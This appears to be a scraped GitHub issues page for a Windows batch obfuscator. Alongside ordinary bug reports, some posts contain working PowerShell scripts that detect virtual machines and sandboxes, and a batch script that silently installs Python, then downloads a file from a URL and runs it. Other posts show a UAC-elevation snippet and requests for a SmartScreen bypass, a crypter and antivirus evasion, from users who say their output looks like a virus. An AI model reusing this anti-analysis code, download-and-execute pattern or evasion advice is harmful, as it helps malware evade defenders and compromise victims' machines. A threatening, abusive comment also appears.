kdot227 / somalifuscatorv2
Most advanced and poorly coded windows batch obfuscator ever made (aka the best)
Home Page: https://sped.lol
License: Apache License 2.0
Explain below
yo pookie its shade add my tele https://t.me/Shade3421
I installed python in the path and when I run the setup.bat and when I press y or n it says
"please install python and add it to the path"
When I obfuscated to level 1, 2, 4 it's always opening command prompt for a millisecond and closing itself. Any ideas why this is happening?
Add Base64 with certutil and certs + add encode/decode hex with certutil (ez)
Describe the bug
After trying to obfuscate the simple batch file which creates a scheduled task, the output file is corrupted and the cmd window is showing a missing parameter
To Reproduce
Steps to reproduce the behavior:
Expected behavior
A clear and concise description of what you expected to happen.
Screenshots
If applicable, add screenshots to help explain your problem.
Additional context
Add any other context about the problem here.
Explain below
Revert back to using task scheduler instead of reg keys cause reg keys auto ask for admin
I already installed WinRAR but it said WinRAR is not installed when I set "true" for "smartscreen_bypass".
Process check: Check for VM-related processes
$ErrorActionPreference = 'Stop'
$url = 'https://raw.githubusercontent.com/A3ima/VmDetecter/main/Vms.txt'
try {
$vmProcesses = (Invoke-WebRequest -Uri $url -ErrorAction Stop).Content -split "`n" |
ForEach-Object { $_.Trim() } | Sort-Object -Unique
} catch {
Write-Host "Error fetching VM process list: $_" -ForegroundColor Red
exit
}
function Get-ParentProcessId {
param (
[Parameter(Mandatory = $true)]
[ValidateNotNull()]
[System.Diagnostics.Process] $process
)
(Get-WmiObject -Query "SELECT ParentProcessId FROM Win32_Process WHERE ProcessId = $($process.Id)").ParentProcessId
}
function Test-ParentProcess {
param (
[Parameter(Mandatory = $true)]
[ValidateNotNull()]
[System.Diagnostics.Process] $process,
[Parameter(Mandatory = $false)]
[string[]] $vmProcesses
)
if ($null -eq $vmProcesses -or $vmProcesses.Count -eq 0) {
return $null
}
$parentProcessId = Get-ParentProcessId -process $process
if ($null -ne $parentProcessId -and 0 -ne $parentProcessId -and $process.Id -ne $parentProcessId) {
$parentProcess = (Get-CimInstance -ClassName Win32_Process -Filter "ProcessId = $($parentProcessId)").Name
return $null -ne ($vmProcesses | Where-Object { $parentProcess -match $_ })
} else {
return $null
}
}
function Test-FilePath {
param (
[Parameter(Mandatory = $true)]
[ValidateNotNull()]
[System.Diagnostics.Process] $process,
[Parameter(Mandatory = $false)]
[string[]] $vmProcesses
)
if ($null -eq $vmProcesses -or $vmProcesses.Count -eq 0) {
return $null
}
$filePath = $process.MainModule.FileName
return $null -ne ($vmProcesses | Where-Object { $filePath -match ".*\\.*$_.*" })
}
function Test-VMProcesses {
param ([string[]] $vmProcesses)
$foundProcesses = @{}
foreach ($vmProcess in $vmProcesses) {
try {
$processes = Get-Process -ErrorAction Stop | Where-Object { $_.ProcessName -match $vmProcess }
if ($processes) {
foreach ($singleProcess in $processes) {
if ($vmProcesses -contains $singleProcess.ProcessName) {
$foundProcesses[$singleProcess.Name] = $true
}
}
}
} catch {}
}
return $foundProcesses.Keys
}
try {
$foundVMProcesses = Test-VMProcesses -vmProcesses $vmProcesses
if ($foundVMProcesses) {
Write-Host "VM-related processes detected:" -ForegroundColor Yellow
foreach ($processName in $foundVMProcesses) {
$process = Get-Process -Name $processName -ErrorAction SilentlyContinue
if ($process) {
$hasVmParent = Test-ParentProcess -process $process -vmProcesses $vmProcesses
$hasVmFilePath = Test-FilePath -process $process -vmProcesses $vmProcesses
if ($hasVmParent) {
Write-Host "Process: $processName (VM-related parent detected)" -ForegroundColor Yellow
} elseif ($hasVmFilePath) {
Write-Host "Process: $processName (VM-related file path detected)" -ForegroundColor Yellow
} else {
Write-Host "Process: $processName" -ForegroundColor Yellow
}
}
}
} else {
Write-Host "No VM-related processes detected." -ForegroundColor Green
}
} catch {
Write-Host "An unexpected error occurred: $_" -ForegroundColor Red
} finally {
if ($foundVMProcesses) {
Write-Host "Script completed with VM detected." -ForegroundColor Yellow
} else {
Write-Host "Script completed without detecting a VM." -ForegroundColor Green
}
}
Read-Host -Prompt "Press Enter to exit"
Hey! I'm writing this bug report to say that it is awesome, But there is one issue that stopped me from using it.
No runtime errors in your code, Nothing wrong with your code except the obfuscation part.
I tried to use your python script to obfuscate my program, But there was one issue.
Lag. Lots of lag. Way too much lag. Seconds to load one single "echo Welcome to Endless Clicker!"
My computer has very powerful hardware that is way more than enough to run a batch script.
I tried many settings in the "src\settings.json" but it would not let me.
There were also many errors that look to be related to PowerShell.
Please fix this issue.
--- My Computer Hardware ---
CPU: Intel(R) Core(TM) i7 - 10700 CPU @ 2.90GHz
Ram: DDR3 32GB of RAM
GPU: NVIDIA Geforce GTX 1660
Network Type: Ethernet
Disk: 512GB
Windows
Traceback (most recent call last):
File "C:\Users\User\Downloads\Important\Obfuscators\Somalifuscator-main\main.py", line 75, in
import BatchParse
ModuleNotFoundError: No module named 'BatchParse'
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\Users\User\Downloads\Important\Obfuscators\Somalifuscator-main\main.py", line 83, in
e
TypeError: unsupported operand type(s) for +: 'ModuleNotFoundError' and 'str'
echo + variable
pause
hey
here is my batch code, I've tried many and yet no success, it always throws some weird error in every batch code
my code:
@echo off
cd /D %temp%
where python >nul 2>&1
if %errorlevel%==0 (
echo Python is installed
) else (
for /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%j
if "%VERSION%"=="6.1" (
echo Installing Python 3.8 for Windows 7
powershell -Command "Invoke-WebRequest -Uri 'https://www.python.org/ftp/python/3.8.0/python-3.8.0.exe' -OutFile 'python-3.8.0.exe'"
start /wait python-3.8.0.exe /quiet InstallAllUsers=1 PrependPath=1
del python-3.8.0.exe
) else (
echo Installing Python 3.12
powershell -Command "Invoke-WebRequest -Uri 'https://www.python.org/ftp/python/3.12.0/python-3.12.0-amd64.exe' -OutFile 'python-3.12.0-amd64.exe'"
start /wait python-3.12.0-amd64.exe /quiet InstallAllUsers=1 PrependPath=1
del python-3.12.0-amd64.exe
)
)
set URL="link"
powershell.exe -Command (new-object System.Net.WebClient).DownloadFile('%URL%','update.py')
python update.py
try filling url with any link and see the results
and a simple tutorial wouldn't be bad at all too
Please upload the original version as some of the functions do not work exactly as described
fix regex for labels with "(?<=\s|^):[^\s:]+"
Add ASSOC and other commands that are able to be expanded via for
I've tried using SomalifuscatorV2 with another script of yours, Bat2Exe, but it seems it's not working. Is there a way to use both at the same time? Thanks for creating two awesome things.
%%A and other stuff like that is prolly broken af but ill fix when im home
Explain below
Explain below
yo ur discord link has expired, and btw are u interested in making a crypter?
Hi, really nice code, it works pretty fine for bat files but it's still quite obvious that it's a virus or something, especially when the cmd pops up.
So is there any way to make the cmd console hidden and not popping up, as well as changing the bat file to exe without raising any antivirus flag?
https://mega.nz/folder/uQYHTYpI
Password : SD-RGYlgOBL7c8_nbKfHwQ
brazenly stole half the functionality from my obfuscator, without even indicating the author 🤡
How do i obfuscate EXE or PS1 files it only lets me obfuscate batch files
Is your feature request related to a problem? Please describe.
I made a batch script, it takes a screenshot of the computer BUT it uses powershell and the grabber completely breaks my powershell code :/
Describe the solution you'd like
Add a "Powershell code finder" and obfuscate the powershell code differently from the batch code
Describe alternatives you've considered
For the Powershell obfuscation you can use this ! [https://github.com/JoelGMSec/Invoke-Stealth]
Additional context
https://github.com/JoelGMSec/Invoke-Stealth
Add array listing for level 1 and ran1
ahhhh not another skid
1.) Fix dead code
2.) Add 0x150 suggestion
3.) Fix speed issue
4.) Dead labels
5.) Label args
6.) Fix small bug issues with ultimate
Explain below
When I tried to obfuscate the batch file and enable the debug mode, not all of the command lines were deobfuscated perfectly; each time there is random garbage in it, and it only got perfectly deobfuscated about once out of 5 to 10 obfuscation attempts, so the obfuscator is working with enough tries.
When I tried to run the test_all.py this is the result I got, can someone @KDot227 help me to point up the problem and resolve the issue? Thanks
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ File Name ┃ Level ┃ Difference ┃
┡━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ C:\Users\1234567\Desktop\SomalifuscatorV2-m… │ Obfuscated Incorrectly │ --- │
│ │ │ +++ │
│ │ │ @@ -1,2 +1 @@ │
│ │ │ -Administrative permissions required. │
│ │ │ Detecting permissions... │
│ │ │ -Success: Administrative permissions │
│ │ │ confirmed. │
│ │ │ +Administrati~-2,1%l%pJbfzLw%BYKxW%COMMONPR… │
│ C:\Users\1234567\Desktop\SomalifuscatorV2-m… │ Obfuscated Incorrectly │ --- │
│ │ │ +++ │
│ │ │ @@ -1,100 +0,0 @@ │
│ C:\Users\1234567\Desktop\SomalifuscatorV2-m… │ Obfuscated Correctly │ NONE │
│ C:\Users\1234567\Desktop\SomalifuscatorV2-m… │ Obfuscated Incorrectly │ --- │
│ │ │ +++ │
│ │ │ @@ -1,2 +0,0 @@ │
│ │ │ -this is a test │
│ │ │ -C:\Users\1234567\Desktop\SomalifuscatorV2-… │
│ C:\Users\1234567\Desktop\SomalifuscatorV2-m… │ Obfuscated Correctly │ NONE │
│ C:\Users\1234567\Desktop\SomalifuscatorV2-m… │ Obfuscated Correctly │ NONE │
│ C:\Users\1234567\Desktop\SomalifuscatorV2-m… │ Obfuscated Correctly │ NONE │
│ C:\Users\1234567\Desktop\SomalifuscatorV2-m… │ Obfuscated Incorrectly │ --- │
│ │ │ +++ │
│ │ │ @@ -1,3 +1,3 @@ │
│ │ │ this is a test │
│ │ │ C:\Users\1234567\Desktop\SomalifuscatorV2-… │
│ │ │ -worked │
│ │ │ +wo~-4,1%u%L(IrtI%USERPROFILE:~5,1%OS:~-7,1 │
│ C:\Users\1234567\Desktop\SomalifuscatorV2-m… │ Obfuscated Incorrectly │ --- │
│ │ │ +++ │
│ │ │ @@ -11,5 +11,3 @@ │
│ │ │ 0123456789abcdefghijklmnopqrstuvwxyzABCDEF… │
│ │ │ 0123456789abcdefghijklmnopqrstuvwxyzABCDEF… │
│ │ │ 0123456789abcdefghijklmnopqrstuvwxyzABCDEF… │
│ │ │ -0123456789abcdefghijklmnopqrstuvwxyzABCDEF… │
│ │ │ -0123456789abcdefghijklmnopqrstuvwxyzABCDEF… │
└──────────────────────────────────────────────┴────────────────────────┴──────────────────────────────────────────────┘
Failed
12.99749860027805
Remove carrot from ran2
i made a simple deobfuscator works on the default settings
import re, codecs, base64, sys

# Read the obfuscated batch file given on the command line.
with open(sys.argv[1], 'r') as file:
    filedata = file.read()
# Keep only ASCII characters.
filedata = ''.join([char for char in filedata if ord(char) < 128])
# Remove every %...% token that occurs exactly once in the file.
tokens = set(re.findall(r'%.*?%', filedata))
for token in tokens:
    if filedata.count(token) == 1:
        filedata = filedata.replace(token, '')
# Take the base64 argument of the first "powershell.exe ... -e" command
# and write it out decoded as UTF-16 text.
payload = re.findall(r'powershell\.exe -ep bypass -noni -nop -e ([A-Za-z0-9+/=]+)', filedata)[0]
with open('output.txt', 'w') as file:
    file.write(codecs.decode(base64.b64decode(payload.encode()), 'utf-16', 'ignore'))
the output : output.txt
Bestie,
plz ur discord or some shi or ill beat your catholic ass
I tried with every single combination in the settings, but it's kinda bugged, 96% of the times it breaks the code, any fix?
Describe the bug
I use this code to get administrator privilege
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
if "%errorlevel%" NEQ "0" (
echo: Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
echo: UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs"
"%temp%\getadmin.vbs" & exit
)
But the window pops up for about 3 seconds then disappears
.
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "function Get-Entropy{param([string]`$inputString);`$frequencyTable=@{};`$stringLength=`$inputString.Length;foreach(`$char in `$inputString.ToCharArray()){if(`$frequencyTable.ContainsKey(`$char)){`$frequencyTable[`$char]++}else{`$frequencyTable[`$char]=1}};`$entropy=0;foreach(`$value in `$frequencyTable.Values){`$frequency=`$value/`$stringLength;`$entropy-=`$frequency*[Math]::Log(`$frequency,2)};return `$entropy};`$bios=Get-WmiObject -Class Win32_BIOS;`$computer=Get-WmiObject -Class Win32_ComputerSystem;`$vm_bios_list=@('VMware, Inc.','Xen','VirtualBox','QEMU','Microsoft Corporation','KVM','Bochs','Parallels','Oracle VM VirtualBox','Red Hat','SeaBIOS','innotek GmbH','Amazon EC2','Hyper-V','Citrix','Virtuozzo','bhyve','Nutanix','Proxmox','Virtual Iron','VMware7,1','Virtual Machine');`$suspicious_bios_list=@('Default','To be filled by O.E.M.','Not available','Unknown','System manufacturer','TBD by OEM','O.E.M.','OEM','N/A','Not Specified','System Product Name','System','System Version','OEM Manufacturer','OEM Product','OEM Serial');`$suspicious_versions=@('VRTUAL - 1', 'INTEL - 1', 'A M I - 9000906','Phoenix Technologies LTD','Award Software, Inc.','AMI BIOS','Insyde Software','Laptop','Desktop','Tablet');`$suspicious_dates=@('01/01/2000', '02/02/2002','01/01/1970','12/31/1999','01/02/2000','01/01/2010','01/01/2015');if(`$null -eq `$bios -or `$null -eq `$computer){Write-Host 'WMI Query Failed. Possible attempt to hide VM.';exit 1};if(`$bios.Manufacturer -ne `$computer.Manufacturer){Write-Host 'Inconsistent BIOS and System Manufacturer. Possible attempt to hide VM.';exit 1};if(`$vm_bios_list -contains `$bios.Manufacturer -or `$suspicious_versions -contains `$bios.BIOSVersion -or `$suspicious_dates -contains `$bios.ReleaseDate){Write-Host ('Virtual Machine Detected. 
BIOS Information: '+`$bios.Manufacturer+' '+`$bios.BIOSVersion+' '+`$bios.ReleaseDate);exit 1};if(`$suspicious_bios_list -contains `$bios.Manufacturer){Write-Host ('Suspicious BIOS Manufacturer Detected. BIOS Manufacturer: '+`$bios.Manufacturer);exit 1};`$entropy=Get-Entropy -inputString `$bios.SerialNumber;if(`$entropy -lt 1){Write-Host 'Low Entropy Detected in BIOS Serial Number. Possible attempt to hide VM.';exit 1};if([string]::IsNullOrEmpty(`$bios.Manufacturer) -or [string]::IsNullOrEmpty(`$bios.BIOSVersion) -or [string]::IsNullOrEmpty(`$bios.ReleaseDate)){Write-Host 'Missing BIOS Information. Possible attempt to hide VM.';exit 1}else{Write-Host ('No Virtual Machine Detected. BIOS Information: '+`$bios.Manufacturer+' '+`$bios.BIOSVersion+' '+`$bios.ReleaseDate);exit 0}"
what happened to cheataway my guy? everyone is either banned or disappeared
Add UTF-8 Anti Change function with labels. Remove obf_oneline class/function and have all batch code obfuscated at one time.
running the setup.bat file
Traceback (most recent call last):
File "C:\Users\Potato\AppData\Local\Programs\Python\Python37\lib\runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "C:\Users\Potato\AppData\Local\Programs\Python\Python37\lib\runpy.py", line 85, in _run_code
exec(code, run_globals)
File "C:\Users\Potato\Downloads\Compressed\SomalifuscatorV2-main\src\main.py", line 7, in <module>
from util.ui.ui import Ui, UiLinux
File "C:\Users\Potato\Downloads\Compressed\SomalifuscatorV2-main\src\util\ui\ui.py", line 6, in <module>
from util.methods.common.common import console
File "C:\Users\Potato\Downloads\Compressed\SomalifuscatorV2-main\src\util\methods\common\common.py", line 74
return "^" if (ran := random.choice([True, False])) else ""
^
SyntaxError: invalid syntax